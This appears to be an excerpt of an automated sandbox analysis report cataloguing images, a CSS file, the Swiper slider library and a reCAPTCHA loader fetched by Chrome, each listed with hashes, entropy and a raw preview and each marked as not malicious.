                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):14131
                                              Entropy (8bit):7.648930759510245
                                              Encrypted:false
                                              SSDEEP:384:4YNg7FGEDmdqmxeyie/ZkW/TRbyuHw9fX6QfZ:4YyMGMqWezmZkOGuHwFpfZ
                                              MD5:37409769D95D1DC52DED73E501110DCC
                                              SHA1:8A40DE9D0DEB7F02BC178BD6A67BB81A379898EE
                                              SHA-256:A6A4BC10406CF46CE0F7FEC6DC43E13088447E5BEB0C8DB00A40B958AADF4BC4
                                              SHA-512:0637E59E991E09E44BE3E0B5CE340CA95936E252E8F9BCEF326AB092EB2E783FB2D100D8D76E7BFD3F1F2B83295119CEC20CC2CCE873AEFB3B73BE4AC5A3BA6D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/71/3791e4e804c74adfefcf6e64a900e6e1.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):70462
                                              Entropy (8bit):7.996896661598661
                                              Encrypted:true
                                              SSDEEP:1536:BiRQVuy0uBpZkmb5RFGFkzqzQ3169hX0cprb1TTFUFi1vhHc/N:BajO+5k3gzEchb8FiHSN
                                              MD5:231DC1227756A2787C291DE830A9327E
                                              SHA1:9F986B9E280BCCCA36E0D36DEB7EF5B7D7F7323A
                                              SHA-256:0D7E5EB7147DB217C4448E9D57403BC27C953FAAB3FB677516870975CF4D9904
                                              SHA-512:3F237D3F5B4BFBDE353B65EFC39323E9E980936B9249CB3ACFBE7992D23BD79D1A7CD1F28E2DD27096604D4DDA4E951B78B86C8E03B8380A9FC5FF887B2FD632
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF6...WEBPVP8X..............VP8 .........*....>.n.R)&)....9...cK.r....jb.[x.q.k.{....).|'.......m............_........i>........A...{..W.....<...yC.O.............?.^..................~...).G...z..._.........._.J..V.w.).o...>..j...7.s.......L.......Y.H...E..F.j...U=..(,...Xs......+xs.I..V....3..e.1KI....pOb93.(...j......4S.....(..s....J...@.>..U.n...%.Vn.rk.S....."*w.].....X.......8..P..^=.b: ....".d.p7b.06.S.\,K...fZ...,.....$^1..x.H....'.....mWK-..q~.........e.?v...kx#..P.n:m&.b......=.e.S.?......H...&..7....V.n.."...~..,......|.^./.d.S?....L.../.IA..(X.c...f.Z}H....5.#..m.l........P...mF?....|....@7.@......[U.........{9.-...W..y.W.L....G.~. 2....EN..S..H..Z.s......[;...P..$.}3.vVg7..{L....@%.-...,..2C.w.g.J`..tA.!.#J./......h@tM5oTe..ihy...?h.K].K.......?."..r06......G.PK..W~.'...W....7..l...B..A?...ox. a..L;...[.b......k+......F....kM...fE.<..Qp,(.Rs..&.p2].6...z.F.........y.?\.%?.x&Q.......~..'.~V.`$.......-..a.. z..&6w...,|>.#y.f...g8.C...Ng.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):8149
                                              Entropy (8bit):7.962297362284578
                                              Encrypted:false
                                              SSDEEP:192:tvd+dm9Ep2Qqt+8u5e4ijEtYalp3dJqDZceoqXPDoSt8e6L:tvKIYh5eBERFJG0+PkPe8
                                              MD5:BEDD8D79577EB2C661837E5C3C90129F
                                              SHA1:56441849C4AEA117BAA290CE03E41A2628B47FDE
                                              SHA-256:EADAAAA7F11C8C4002C7A12A0375F079A9C5EA82D7F42722C817D282791A912A
                                              SHA-512:20B34287A798A93ACB774D4E2C03633344BBD971C470C64942FF330A177CB67B3F49B70B2F03313C2125A6E21DBE3267F20012356C221309DE4A43CBB6AC48F0
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE......3V./S.........................6Q.....V.-^..........-X....-T......./V..........0T..................................,X......>.............................................2M................5O...................=.......e....=D..............)d...A...t....1...........G........-#P....!j.%X./O.......|...w...B<A.jw....&s. ..)I...........<P.#P..m.......Mi....%W.......|..0b...8<...l...z.@............o.............Z......]4.............@]n.....P..S...... A.(|.|........]...........=....&.Tv..+......./...vex.".29..lS5X.{.sh{....!.....H\......Em...Z..E.....'L....6r..2&k..$F.kr.&A...i3>...+....mI.u./..T.....v.......)........;?...dv...M!.OH......7z.ak.?W.Z.......T..q....6x\...`.s.wy..QY........].FX........#C........h.G{bWj..pb...Aw...}NU.$..Y....IDATh..oh.y....qt......rj<M+...oV....hd.J..d.`...H.f..Y....l.a.h..MB^$..-.M.n.X.....\....M...8(....I.i...W.h..>...>..H...I. .F.....H..I.....2T.p..JI1.Lid....%....Dt.aR)IJ..(..G.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 64 x 64, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):1158
                                              Entropy (8bit):7.723713747889109
                                              Encrypted:false
                                              SSDEEP:24:3Qs/6BlqEboNd0ITwammvMTMDBTbMwsl2Wnzl2xHHh00wo6:33/6BYYoNd0ITYcYmTJsP4lO0o
                                              MD5:8402E328FEAA01B4D8FB17DCE7C5D61B
                                              SHA1:9849F20CF772C20F4F9E17C85E2107675B7594CE
                                              SHA-256:5BFF0E6830AB6EE936935115262A31D1AADC9A7050718F032DDE63641334D641
                                              SHA-512:8ACD9A5657C80865321A896B2B2DB87268CF16F711785E8AE3A01DC888E2D4937052940CB47F45E82C829A1986C632F4EA39099D61E0B6E597CD33041C75D46D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...@...@.....%......sRGB...,.....pHYs................+IDATx..X.K.Q...K. .P.E....d$.F7.^.m7..]l~..(~6E...9?.s~LEm.z..],/.Em......|Q.y.{..M:.....y~..9.y.y..yX.))...t..]\....s.5.@.'{..k...`...F..`....;.F@.8....`....;.F@d.33....V...%.W.@........D.=...x....@Gf.V.. ..7&...6........M..SSoGF.KK.....f..........*...1..........=.....'.k.`..p../U.\.........T*.R.. ....4....$..UWW...c.....p8..%...M.D'.t...."\(......IKK......m."z.a...V.B........K!t.V............I......G..._.O!.......J.........nB!.N.8::..|...)..1.LF.1.C..n...nB.@...o".."1..F....... ~..dvvvssS.V..b...........Y\\lll$ `...3$Xy@.....G.......`~.r...Cx.....TT............%..!....z..ZXi....F$. 1R.......b...j...b........a..p..+*w...k.TP..c......o.sQ..-:...O....r..,|.A!(.i+PQ..J."E.f3....j.9%j.J....}D&..F..3xAKN:...J.Z,...........@(.BwK..........'...5....5....4....u8B7H..@..#pB.N..........-..r.a.G...h.fK.|..Hx......}.....WT..m.Z-...9...7.......i.N...8p.nno..?.g\f..T..\_XD....W..../.......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components 3
                                              Category:dropped
                                              Size (bytes):54674
                                              Entropy (8bit):7.9666689215115065
                                              Encrypted:false
                                              SSDEEP:1536:eXc1jlalEIf6diHeaZwKQRxi1gHZn2FSyDKltvTffffffffffffffffffffffffZ:eX2LNiHeaZMRx8g8oyDwTffffffffff5
                                              MD5:D9009CF8DB0331C76B1B53BB58A3C2F1
                                              SHA1:BE6A100DE33B2207EEB7B0299C899E9E047CFB7B
                                              SHA-256:4794E7ED96BE3356744A14345EC414B8D4833537113B473EE284D94785DA9338
                                              SHA-512:028D6F05FA4398CF899CD62347C5D8EE28073A9E309A70DE4531C218000BF84A8AC1CD06F8B4A28A9662AFC635460A1E82CBCC8B036581E34BBA1BD0255339B3
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF..........................................................................................................................................................."........................................._........................!.1A.."Q.2aq..#BR...3Sr....$Tb..........CUs......%4Dc....&t.6du...5..................................?........................!1AQa..q..".......2R.#B...Sbr...4...3............?..)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.JR.R....(.)J.J
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):24323
                                              Entropy (8bit):7.841875536958953
                                              Encrypted:false
                                              SSDEEP:384:4YNg7S6xa/mbs/Rb1ctrrAjriwjNtZt8/Wv0ux/DYx/5qwpqrO5:4Yyk1ctrCptZtFMu5o0wMrG
                                              MD5:FAF53F987F3D160321D94AF64B10657A
                                              SHA1:368DDF52AE07D921E4E0D576133A4440079AC5F6
                                              SHA-256:94996E91491ACB62063C4BE3AFF23761C75FC5FDEBA354E4A75743970B8A3635
                                              SHA-512:639A996AE59D3325C4346333E4D2494F6F9D6C48D590F1D5339BFC9CFC89EBC7F0D3492512C3CF4148E8C2ED217BB15D4E97D1851D853757A435350FC95CEA5A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/70/584282c7b59b2c27f54936e92c8aaeae.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:assembler source, ASCII text
                                              Category:downloaded
                                              Size (bytes):3746
                                              Entropy (8bit):4.794823751105359
                                              Encrypted:false
                                              SSDEEP:48:Uwx8rX2V3dhsd1LDAq5T5MBx210ZdhBFwVcc1m7FDzlx/a:jx8rmVsd1BPm2GbFwVv1m7FDzry
                                              MD5:1CFED110C33E029020DBEDCA92DF87D8
                                              SHA1:F2CF4708A9C2E1A0ECDCF26DF4BA28FE47559632
                                              SHA-256:EAB30933C37A00D01F952CDB7E212DE8B291A37C5D70631BD9CCADD089D4C55C
                                              SHA-512:85317B6A7F52A224A79AF6DA0D093D4047ECA82AD8AE2BEBE6D5C3C7ADDE91125329B21A74F273812E3B5510884690E35487E469876D187CCD874437290C443E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/css/custom.css
                                              Preview: .partner-section-four .wrapper {. max-width: 1450px.}...pricing-section-four .wrapper {. max-width: 1744px;. padding-left: 12px;. padding-right: 12px.}...pricing-table-area-four .pr-table-wrapper {. border: 1px solid #e3e3e3;. height: 100%;. padding: 20px 20px 25px;. margin-top: 40px;. position: relative;. z-index: 1;. text-align: center;. transition: all .3s ease-in-out.}../*.pricing-table-area-four .pr-table-wrapper:before {*/./* content: "";*/./* position: absolute;*/./* width: 100%;*/./* height: 100%;*/./* top: 0;*/./* left: 0;*/./* border: 2px solid #000;*/./* z-index: -1;*/./* opacity: 0;*/./* transition: all .3s ease-in-out*/./*}*/...pricing-table-area-four .pr-table-wrapper .pack-name {. font-size: 28px;. text-transform: uppercase;.}...pricing-table-area-four .pr-table-wrapper .price img{. width:100%;.}...pricing-table-area-four .pr-table-wrapper .pack-details {. color: #878787;. letter-spa
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 21 x 15, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):227
                                              Entropy (8bit):6.312101672192353
                                              Encrypted:false
                                              SSDEEP:6:6v/lhPJIIsB/6TsR/WxoFhvKBY8QUW4yIrGcZEWqtjp:6v/7nO/6Ts/RLvrwOWON
                                              MD5:9BF71E02CAE86D3531874FBDCF4F065E
                                              SHA1:854A8797F34AC41CD7D36718108F950DBA7EBF4A
                                              SHA-256:FEA8DAF5E826C31879B0653A43AC509B48ABAA6A5214847EFBA242A31CC32F66
                                              SHA-512:9DF0D465723748D0CAE31DCB8D7A7697D405F493FA3541D33D19AD8A74E7549971DCF9C909B3025E37ECF113AE7E7B864A7A8DE84A88792A05FF86F607AFA446
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/icon/menu-black.png
                                              Preview:.PNG........IHDR..............Z.k....pHYs.................sRGB.........gAMA......a....xIDATx...... .......,.&.....#..l..,..GI*..p..&m.......:.Zon.....gc.G....sn.........T...Rvf.V.....z..lXR.}..Nd..3.$y|.ir ..>.K....IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):27366
                                              Entropy (8bit):7.859620931902841
                                              Encrypted:false
                                              SSDEEP:768:poIPONmgetaZRFgyFE6tIlTzaa/ICYhBG9Sf7HM1dh:6IPz/taZR+yFEHlTmdpjK8Hq
                                              MD5:1AE6FC2C1CA16F13A0B3DA73893DB593
                                              SHA1:F5299BDE5A8CC6DDF94F638C3E595C0A8C009B0D
                                              SHA-256:DB6C4391C6F5432B683302DD5730B07FAA0D761ED1A337EFD7712D915ECEF82C
                                              SHA-512:BC17C33404AD53BFEB7D6360E5C90432AA288810F446BE914E7BC27BE2DDBF0B2D4694B6961309320972D28B45E75BB46FE5D927E1BDE3B4966CAE5ECB0AA133
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:3CE58371925F11EDB3CE8B30C952F823" xmpMM:DocumentID="xmp.did:3CE58372925F11EDB3CE8B30C952F823"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3CE5836F925F11EDB3CE8B30C952F823" stRef:documentID="xmp.did:3CE58370925F11EDB3CE8B30C952F823"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................&..?...T...j.................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):9382
                                              Entropy (8bit):7.9518312245249
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wa3SPWOjGC2XZFltj0hRW1c6CpW5fcCD31YbXz487:K0wDeOqD5oZWWCJI7
                                              MD5:7F31C74A446FF495189BF539A7AFAF79
                                              SHA1:B33E26005D105B0F68642950F8E4FB93500D1CE9
                                              SHA-256:F913708236DAB7EF9F9E8615ADF928E5F99C0F859B447264D78E0540D9B4DC3B
                                              SHA-512:F42104DB6EDAFAA7C045EE94D9A2AA003E7932E62684FDFE5D0F8244A6D5917B19BA4A5B9BFCB98A906033E06AC4CB4F26297CD64EE63F37D5A16729F9EAC8CD
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):44502
                                              Entropy (8bit):7.994815034694258
                                              Encrypted:true
                                              SSDEEP:768:cQCJr/3/NjHv4T/BpIHTZMFMKYGTTonjlhO7umfXv6znmi0eOr+Bmx5EaIU7RfG:cQ8rHNjHv4TpkZiYGUq9ff6z+r+Qx5d6
                                              MD5:F7147B4BD7924DD7B0609049F3BBD556
                                              SHA1:F960917D6B478EF8EDD989860AF51EAE367EED3D
                                              SHA-256:CAC90EA67E46423A634B3751DC7937DAAA029B08653F10B9719EFD1380285D7C
                                              SHA-512:A378C4EB99A9BFF93F7A7F0A118AE4B20CBED4DDA839F5CA3E43F2E8CF0F9B1CFA4F53E7798F59362F0222A360A0FE85BD6FE3D40CABCE8D77F8F1D0BE02AF16
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF...WEBPVP8X..............VP8 Z.......*....>.p.R.&./..za...en.1...R.....}..sz.A..y*t.......L..\..zrq....z.g..8w.c..~....4^Z_..7.'.O..../.~..i......w........O.)..*.....{......z[.?.?W..=y...?DO...~..D...@S] )....H.k..5.D.@S] )....H.k....t...@S] )....A.o..A4.4.]...x....A7.J..6Yu.~..m...*../}.."6>H....KT....Mt...$y*......Jc ..9..+.M..j;.[..Ot...D.p...|.3..t.k.g...E;..>..{.L,.&...*3...41..q|XS...:./..[.k......+..=%.....Gk.ls?.b\w.r*.29...q.M d}.i..=...&..l..-)t.......L,.X.....k....r..b...B.];.`1..+b{..O.2..1...mR$lC.T... .C......-....6....%........%.D..H.Y4L,.@.&....,m?......./c.@X.gBy...2....D.4_...k..5.)%.....W*.R..M..D$. p..0..cAW.66...2..Y'.Mt.[. Vd.....R.h.!...=..vt......J...6..2.\<l....13.../i..E...y....@,'............]....)4ws.'.].......h.Rp..W.....g7*....=....r.......GP.../..[RGP..A..6I..].....:.a[.......)..y.......Q..?h..Y......~.u.yx...6%^.a8..p.]........p.....)...*..?7...gJ.Mh..D...y.6.....0U..g.+i......Kx.l+eH...H.k..8h..PmT.p.Su._..R.o8..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65284)
                                              Category:dropped
                                              Size (bytes):142399
                                              Entropy (8bit):5.249945129624385
                                              Encrypted:false
                                              SSDEEP:3072:8Jv6judkJpInxfpoy9v8cIWyUaV4y+rGHJEyEfBNK/MxF:8Jv6idkJpInxfpl9v8cIWybV4y+rGprA
                                              MD5:3ECE71448BBA0FB694F7A45192846F96
                                              SHA1:3ABB9F361B43D2E733A4703BAE6ACED45B3C8CBF
                                              SHA-256:FDED9EC5820AD165D5B36A6F23FAC4B0F2D1B32E714D651C081122442C0DF277
                                              SHA-512:1166ADD3FC24119B44ECE10D846EF4D13FA39ABA474AD192EC2A87500CCA5B93333675446BD59F6FECC98C5E21A174A03135A58B12F9160AA18F1E4F02589A5F
                                              Malicious:false
                                              Reputation:low
                                              Preview:/**. * Swiper 8.2.2. * Most modern mobile touch slider and framework with hardware accelerated transitions. * https://swiperjs.com. *. * Copyright 2014-2022 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: June 1, 2022. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).Swiper=t()}(this,(function(){"use strict";function e(e){return null!==e&&"object"==typeof e&&"constructor"in e&&e.constructor===Object}function t(s,a){void 0===s&&(s={}),void 0===a&&(a={}),Object.keys(a).forEach((i=>{void 0===s[i]?s[i]=a[i]:e(a[i])&&e(s[i])&&Object.keys(a[i]).length>0&&t(s[i],a[i])}))}const s={body:{},addEventListener(){},removeEventListener(){},activeElement:{blur(){},nodeName:""},querySelector:()=>null,querySelectorAll:()=>[],getElementById:()=>null,createEvent:()=>({initEvent(){}}),createElement:()=>({children:[],childNodes:[],style:
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):35420
                                              Entropy (8bit):7.993905197867692
                                              Encrypted:true
                                              SSDEEP:768:AbMqJ53jmtt1WCS6r2xzx04mDKDwVhM6SK5riZyN3NgJPaJf:+Mqv3KoCSRxqKDwT5rH9gJ
                                              MD5:B78A937F1C5681742125A37AC54D8792
                                              SHA1:3A43852226F0140C45E1EDEBB9739BA44FDB893D
                                              SHA-256:9199894EF5EE5348ACAE329010B59EEC7E0864B6899B43B3BCE65CA0058D25F6
                                              SHA-512:5027B03296634D14B23B412B47E4AD82C74D1762A5B92687D2D93B2F12602BF74C8F7A8ABD223AE7FE0E8108087EB07505EBFCC33C72A4E5FAC53F65329EB72D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://i.ytimg.com/vi_webp/vs01gUJV3iQ/sddefault.webp
                                              Preview:RIFFT...WEBPVP8 H...P....*....>m0.G.".)&.;y ..en-.]O.......q...N|...O*........c.X.........{y.Z..%.^y..V3]...U.......[.../6.N.....+.l....y....z.8.g.}.........+.........i..~..O.......@."z......?..>......`/0.......w...7...?......../......v..............c...+.W...2.^d....y... ..@+.W...2.^d....y... ..*...qg'.0E.....^..]... ...g.0E..hob.5......."pU..E,0..A..q.A.mj.B.e.\.t..}.).Km...3K.K.8#.1..f.Q..3.CC..a./..G..h{.*..rfn.I..oO.m...A.1.XF.......[....s.68r..8t....MwO...I5......GN...M;`.E.....:.B.@N....|T[..].;.<...e...M...s.4.x...'...`...d..B...#\...h.j....../......8.3.....<.yAi..O..9....*...f......!...:.R.....z.Oh.>+..=.can.e..3.........xutE..+.e..wK..2w...![>P>`.!I...2.mE......3.........<...G/..f-u..zQ:.C.......Q.mutU.uGx....>.c....s....<...p.m.rG..0.......v;......T....*..x...C.~..Da....I.....K..[.D..-.{.|.9..-.c...$e..L......K....5.\..aFBPk..^Y....m.=.F.\*.S.O......x...Q.7rU..,.R....b...>. ..##.I...fS8..y....s@.D{r$Y.{F.b..{....0.$:.+<={c.,1
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1434), with no line terminators
                                              Category:dropped
                                              Size (bytes):1434
                                              Entropy (8bit):5.782287307315429
                                              Encrypted:false
                                              SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtw1aWDAQosLc:VKEctKo7LmvtUjPKtX7S1aiRLrwUnG
                                              MD5:E7F4945A3458503BDEE0AD9476537604
                                              SHA1:CD049E2F8F9D05ABC087BBEF7EFEDA01EFB0F3A6
                                              SHA-256:8AB3BC08E25F6A7E24EF75EE66ED06360BCEEACE487D22822D7724B3F2BBED50
                                              SHA-512:BD30B50396E0015B723FFD185972E37094A5CFF4A42CB5AE5D439AE3B85F2735F33145B363E2657AC174D66ED2E3F97FC0C2BFC9FDEE6B06C61E5A01FD1CFF34
                                              Malicious:false
                                              Reputation:low
                                              Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3429
                                              Entropy (8bit):7.9008187670194205
                                              Encrypted:false
                                              SSDEEP:48:u/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODdPlSw1lHK:uSDZ/I09Da01l+gmkyTt6Hk8nThlfgH
                                              MD5:A1DD359517B8BB2262F12C2674385898
                                              SHA1:28DCE6C0589ABB0A13AB9B6EE4B47EE17DBC85DA
                                              SHA-256:7BF65445CFB18EC423EACB8ED920F41126178515E22D00D7C8FF249CB1144D13
                                              SHA-512:943BC6124DC8B8705E7C1FF1E151F5DCDABD5F044819A0B2AB449BF72AE427CD18D4560D483271CE561C355013BAD2BB8EBD0F450A44ECC07EE7BDCE2B0E3A66
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/rlod.png
